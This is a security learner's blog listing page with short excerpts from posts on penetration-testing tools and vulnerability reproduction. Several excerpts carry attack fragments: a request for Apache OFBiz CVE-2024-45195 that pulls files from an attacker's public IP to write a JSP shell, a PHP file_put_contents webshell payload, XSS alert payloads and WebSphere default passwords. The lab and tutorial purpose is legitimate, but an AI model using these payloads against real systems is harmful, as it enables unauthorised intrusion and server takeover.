自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(36)
  • 收藏
  • 关注

原创 UAC绕过

UAC(用户账户控制)是微软自windows7以及后续windows系统中引入的一种访问控制功能(之后几乎所有Windows版本都包含了UAC)。UAC的主要目的是确保应用程序只限于标准用户权限,当需要其他权限时,会弹框提示询问 “是否允许以下程序对此计算机进行更改?”,举个小例子,当我们每次安装新软件的时候,都会弹出一个对话框,询问我们是否允许此程序对计算机进行更改。

2024-12-06 09:02:39 876

原创 sqlmap --os-shell的原理(MySQL,MSSQL,PostgreSQL,Oracle,SQLite)

【代码】sqlmap --os-shell的原理(MySQL,MSSQL,PostgreSQL,Oracle,SQLite)

2024-12-05 16:24:52 1221

原创 绕过403 403bypass工具

这是实现了一个基于 Tkinter 的图形用户界面工具,用于进行 HTTP 绕过测试,主要针对 403 禁止访问错误的绕过。工具通过发送多种 HTTP 请求(包括 GET、POST、PUT 等)和应用不同的绕过路径模式(如使用%2e/./等),尝试绕过网站的访问控制。

2024-11-21 15:00:45 452

原创 websphere CVE-2015-7450反序列化和弱口令,后台Getshell

/登录界面 //http://you-ip:9060/ibm/console/unsecureLogon.jsp http://you-ip:9060/ibm/console //默认账号密码: websphere/websphere system/manager //进入后台 http://you-ip:9060/ibm/console/login.do。3.一直点击下一步,直到下图,填写上下文根,关系到你访问的URL,接着一直点下一步直到安装完成。刚刚虚拟机崩了,重新弄了一次。通过工具可以RCE。

2024-11-06 15:12:14 731

原创 Apache OFBiz 远程代码执行漏洞复现(CVE-2024-45195)并拿到shell

DATAFILE_LOCATION=http://公网ip:端口/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://公网ip:端口/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce。Host: 对方的host。这次使用的nc命令为。

2024-09-12 11:34:52 1102 1

原创 docker命令

docker search 镜像名docker imagers 查看镜像docker run -d 后台启动-P 默认端口-p 本地映射端口:镜像端口docker commit -a 作者: 设置镜像作者信息。容器id 新的镜像名:版本-m 注释: 为镜像添加注释。-c 提交: 从容器中复制指定的容器配置。-q 静默: 不显示任何输出。docker save -o 压缩出的tar包名 镜像id:版本docker stop ID 停止docker rm 容器id 删除容器。

2024-09-06 08:30:00 741

原创 docker装大米cms(damicms)各种cms可用相同办法

访问kali的ip:8080/

2024-09-05 16:13:32 929

原创 docker安装DVWA(巨简单)

启动docker run --rm -it -p 80:80 vulnerables/web-dvwa。拉取镜像docker pull vulnerables/web-dvwa。

2024-09-05 14:39:43 545

原创 docker命令

删除一个 docker rmi -f 镜像名/镜像ID #删除多个 其镜像ID或镜像用用空格隔开即可 docker rmi -f 镜像名/镜像ID 镜像名/镜像ID 镜像名/镜像ID #删除全部镜像 -a 意思为显示全部, -q 意思为只显示ID docker rmi -f $(docker images -aq)docker exec -it 容器名/容器ID /bin/bash #进入 前面的 redisText 容器 docker exec -it redisText /bin/bash。

2024-09-05 10:24:10 566

原创 log4j漏洞原理以及复现

kali:192.168.222.165 本机:192.168.225.18。

2024-09-04 21:10:51 1143

原创 fiddler安装和汉化和抓https的包

3、将压缩包「fiddler菜单汉化」文件夹中的「FdToChinese.dll」复制到「D:\Programs\Fiddler\Scripts\」2、将压缩包「fiddler菜单汉化」文件夹中的「FiddlerTexts.txt」复制到「D:\Programs\Fiddler\」1、「安装英文版Fiddler」、假如将Fiddler安装在:「D:\Programs\Fiddler」刚下载安装好后,是默认不支持抓取HTTPS协议的,要想抓取HTTPS,设置抓取HTTPS功能。

2024-09-01 14:07:06 557

原创 mysql学习下

语法:INSERT INTO 表名(字段名1,字段名2,…)VALUES(值1,值2,…);例题:向student表中插⼊(id为1,姓名:xiaoqiao,年龄:18,性别:woman,⽣⽇:2002)数据。

2024-08-28 10:00:00 1141

原创 mysql理论学习上

SQL 是⽤于访问和处理数据库的标准的计算机语⾔。SQL,指结构化查询语⾔,全称是 Structured Query Language。SQL 让您可以访问和处理数据库。SQL 是⼀种 ANSI(American National Standards Institute 美国国家标准化组织)标准的计算机语⾔。简单来说就是按照 数据结构来组织、 存储和管理数据的仓库。数据库是以⼀定⽅式储存在⼀起、能与多个⽤户共享、具有尽可能⼩的冗余度、与应⽤程序彼此独⽴的数据集合。

2024-08-27 16:14:50 1589

原创 ssrf绕过方式

DNS是Domain Name Service的缩写,计算机域名服务器,在Internet上域名与IP地址之间是一一对应的,域名虽然便于人们记忆,但机器之间只能互相认识IP地址,它们之间的转换工作称为域名解析,而域名解析需要由专门的域名解析服务器来完成,这就是DNS域名服务器。要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Server,在我们的可控的DNS Server上编写解析服务,设置TTL时间为0,这是为了防止有DNS服务器对解析结果进行缓存。

2024-08-27 08:49:08 1515

原创 Google搜索语法

搜索网页标题中包含有特定字符的网页。例如输入“intitle: 商城”,这样网页标题中带有商城的网页都会被搜索出来。1.2inurl搜索包含有特定字符的URL。例如输入“inurl:zheng”,则可以找到带有zheng字符的URL。1.3intext搜索网页正文内容中的指定字符,例如输入“intext:白云间”。这个语法类似我们平时在某些网站中使用的“文章内容搜索”功能。搜索指定类型的文件。例如输入“filetype:zheng”,将返回所有以zheng结尾的文件URL。1.5 Site。

2024-08-23 07:00:00 1142

原创 漏洞扫描器Xray,下载和使用

漏洞扫描器Xray。

2024-08-22 14:55:02 702 3

原创 fscan下载和使用

fscan是一款用go语言编写的开源工具,一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。按照软件官方的说法,该工具支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis 批量写公钥、计划任务反弹 shell、读取 win 网卡信息、web 指纹识别、web 漏洞扫描、netbios 探测、域控识别等功能github下载。

2024-08-22 14:53:21 1004

原创 dirsearch和Dirbuster的使用

-remove-extensions 移除所有 wordlist 的后缀名 (admin.php --> admin)-X,--exclude-extensions 排除的文件拓展名(逗号分隔) 如-X asp,jsp。-i 保留的响应状态码(以逗号分隔,支持指定范围) 如(-i 200,300-399)-x 排除的响应状态码(以逗号分隔,支持指定范围) 如(-x 301,500-599)-e,--extensions 包含的文件拓展名(逗号分隔) 如-e php,asp。

2024-08-07 07:16:30 1184

原创 查看有无XSS漏洞验证

confirm(/xss/)</script>",验证页面是否弹框。7、返回到http://ip/xss/level1.php?name=test页面,利用XSS漏洞验证其他弹窗语句,在test后输入"<script>prompt(/xss/)

2024-08-07 07:15:00 522

原创 常见的端口服务以及漏洞,常见中间件和常见中间件的漏洞

端口对应的服务存在的相关漏洞21FTP:文件传输协议爆破, 嗅探, 溢出, 后门, 匿名访问22SSH爆破, OpenSSH漏洞23Telnet:远程连接爆破, 嗅探25SMTP:邮件服务弱口令, 未授权访问, 邮件伪造53DNS:域名系统DNS区域传输, 劫持, 缓存投毒, 隧道技术刺透防火墙80HTTP常见Web攻击, 控制台爆破, 对应服务器版本漏洞110POP3弱口令111RPCBind未授权访问, 缓冲区溢出, 拒绝服务攻击, 信息泄露135。

2024-08-06 08:26:37 1272

原创 kali开启ssh远程服务并连接

将PermitRootLogin prohibit-password和PasswordAuthentication no 去掉其注释,并将no改为yes,然后输入:wq进行保存。找到其中 # PasswordAuthentication no 去掉其注释,并将no改为yes,然后输入:wq进行保存。进入修改配置文件 sshd_config。先用命令进入到 cd /etc/打开vim ssh_config。查看是否开启ssh服务。设置ssh服务开机自启。

2024-08-06 08:11:27 516

原创 反序列化漏洞常见的魔术方法

_sleep__wakeup()__get()__set()__call__toString__invoke。

2024-08-05 11:35:29 689

原创 linux_kali Nmap配置使用

它使用原始IP报文来发现网络上有哪些主机,这些主机提供什么服务(应用程序名和版本),服务运行在什么操作系统,它们使用什么类型的报文过滤器/防火墙,以及一些其他功能。从扫描结果中可以看出,靶机上运行的操作系统类型为Windows Server 2003,TCP 80端口运行着Apache httpd 2.4.4,PHP环境的版本为5.3.26。nmap -p T:1-65535,U:1-65535 -sS -sU [靶机IP]在靶机B-SQLi-dvwa上,启动phpstudy,启动数据库和Web环境。

2024-08-05 11:28:41 770

原创 远程命令执行-漏洞利用之获取敏感信息和远程命令执行-漏洞利用之读取敏感文件

探测到网站存在远程命令执行漏洞,可以利用PHP魔术常量获取相关信息。PHP 向它运行的任何脚本提供了大量的预定义常量。不过很多常量都是由不同的扩展库定义的,只有在加载了这些扩展库时才会出现,或者动态加载后,或者在编译时已经包括进去了。有八个魔术常量它们的值随着它们在代码中的位置改变而改变。__LINE__ 文件中的当前行号__FILE__ 文件的完整路径和文件名。如果用在被包含文件中,则返回被包含的文件名__DIR__ 文件所在的目录。

2024-08-04 11:57:44 654

原创 远程命令执行漏洞利用之写shell

_POST[1],$_POST[2])),并发送post数据:1=info.php&2=,成功执行代码(Warning警告,但是并不影响)a=var_dump(file_put_contents($_POST[1],$_POST[2]))",访问。利用远程命令执行漏洞可以执行写文件的代码,生成新的脚本文件。

2024-08-04 11:57:16 241

原创 php常见代码执行函数和常见系统命令执行函数。

a($b)动态函数。可成功写入一句话木马。实验靶场以及页面源码。

2024-08-03 14:13:13 379

原创 Hashcat的使用

Hashcat适用于Linux、OS X和Windows等操作系统,支持多种计算核心(包括CPU、GPU、APU、DSP、FPGA等),支持的散列算法包括Microsoft LM、NTLM哈希、MD4、MD5、SHA系列、Unix加密格式、MySQL和Cisco PIX等。hashcat -a 3 -m 1000 [user账户的密码Hash值]?(假设已知user账户的密码是由数字、小写字母组成、长度为4的字符串)2.利用Hashcat对user账户的密码Hash值进行暴力破解。

2024-08-03 09:09:08 902

原创 linux shell 写的一个小玩意(bash含99乘法表和计算器)

echo "+ 我思考一下哦 + "echo "+ 不要怜惜我哦 +"echo "+ 弟弟上点有难度的 +"echo "+ 请弟弟输入正常的格式 +"

2024-08-02 16:13:02 850

原创 LINUX shell(bash) 实现加减乘除计算器

echo "输入参数有问题"创建一个文件jsq.sh。按ctrl + c结束。

2024-08-01 19:18:39 446

原创 js逆向加盐后的解密实战

缺少navigator 给var navigator ={};确少window 添加 window = this;成功返回但是他是加盐过的所以就每次不同。随机输入账户密码发现密码加密了。寻找password赋值。查看 JSEncrypt。将网页内容复制进工具中。

2024-08-01 08:38:10 512

原创 JS逆向 (简单)

查看里面password的值怎么来的,oLoginPwd.val().replace(/(^\s*)|(\s*$)/,"");把hiddenPwd复制粘贴到文本框hiddenPwd = CryptoJS.MD5(password+"zol");发现此处有用到加密,但不是pwd 是hiddenPwd ,在这个周围看看。发现值的内容与F12的值相同,所以说明成功解密他的加密方式。发现他把hiddenPwd的值赋值给pwd。搜索pwd,并且查看是哪里给他加密的。将下面的p修改成123,如何运行。

2024-07-31 17:26:45 462

原创 linux shell学习(上)

打开文本编辑器(可以使用 vi/vim 命令来创建文件),新建一个文件 test.sh,扩展名为 sh(sh代表shell),扩展名并不影响脚本执行,见名知意就好,如果你用 php 写 shell 脚本,扩展名就用 php 好了。输入一些代码,第一行一般是这样:实例/bin/bash是一个约定的标记,它告诉系统这个脚本需要什么解释器来执行,即使用哪一种 Shell。echo 命令用于向窗口输出文本。

2024-07-31 17:11:45 1195

原创 Linux安装Apache,mysql和php,(LAMP环境的搭建与部署)

yum list installed | grep php 或者 rpm -qa |grep httpd为空发现并没有。

2024-07-29 19:52:32 1888

原创 php面对对象学习

访问语法$对象名->属性名,也可以当成数组通过print_r打印使用const 常量名 =值常量可以直接调用,常量存储在静态区,所有这个类的对象都可以调用调用的话::加常量名。

2024-07-29 16:21:46 1139

原创 linux学习

proc 是 Processes(进程) 的缩写,/proc 是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,这个目录是一个虚拟的目录,它是系统内存的映射,我们可以通过直接访问这个目录来获取系统信息。var 是 variable(变量) 的缩写,这个目录中存放着在不断扩充着的东西,我们习惯将那些经常被修改的目录放在这个目录下。dev 是 Device(设备) 的缩写, 该目录下存放的是 Linux 的外部设备,在 Linux 中访问设备的方式和访问文件的方式是相同的。

2024-07-29 15:32:50 922

原创 javascrip逆向破解加密实战

发现有一个js文件写着md5函数,将文件整体复制到调试文件中,复制到上面函数,使用函数,发现。挨个查看发现在此处进行了密码加密,调用md5()函数对获得的密码进行加密。打开F12查看发现密码进行过加密。通过查找password。继续在网站中查找md5函数。输入账户和密码个是12。

2024-07-29 08:59:48 580

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除